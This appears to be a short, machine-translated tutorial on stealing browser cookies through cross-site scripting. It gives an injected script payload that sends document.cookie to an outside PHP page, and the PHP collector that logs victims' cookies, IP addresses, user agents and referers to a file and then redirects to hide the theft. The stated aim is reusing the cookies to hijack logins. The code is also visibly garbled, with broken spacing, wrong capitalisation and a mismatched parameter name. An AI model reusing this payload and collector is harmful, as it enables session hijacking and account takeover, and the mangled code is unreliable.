In my personal opinion, cross-site communication means that javascript code can be executed. javascript uses the cookie attribute of the Document Object to obtain the cookie, and then may use the cookie to cheat login.
The principle of Cross-Site cookie extraction is equivalent
How to obtain the cookie from the browser + send the cookie to the specified url
For example:
"> <Script> document. location = 'HTTP: // www.bkjia.com/test. php? Cookie = '+ document. cookie; </script>
Used in sequence:
1. The cookie attribute of the DOM object in the browser, and the cookie value is obtained.
2. Pass the cookie value as a parameter to the test. php script on the localhost server and submit data using the GET method.
3. Use document. location to redirect. Actually, data is submitted through url access.
The content in test. php is similar:
<? Php
$ Cookie = $ _ GET ['cooker']; // GET the cookie variable value in GET Mode
$ Ip = getenv ('remote _ ADDR '); // REMOTE Host ip Address
$ Time = date ('Y-m-d g: I: s'); // display the time in the format of "year-month-day hour: minute: second"
$ Referer = getenv ('HTTP _ referer'); // link Source
$ Agent = $ _ SERVER ['HTTP _ USER_AGENT ']; // user browser type
$ Fp = fopen('cookie.txt ', 'A'); // open cookie.txt. Create cookie.txt if it does not exist.
Fwrite ($ fp, "IP :". $ ip. "\ n Date and Time :". $ time. "\ n User Agent :". $ agent. "\ n Referer :". $ referer. "\ n Cookie :". $ cookie. "\ n"); // write the file
Fclose ($ fp); // close the file
Header ("Location: http://www.bkjia.com"); // redirects the webpage to the red/Black consortium for enhanced concealment
?>
The user data comes from the browser header information in the HTTP packet.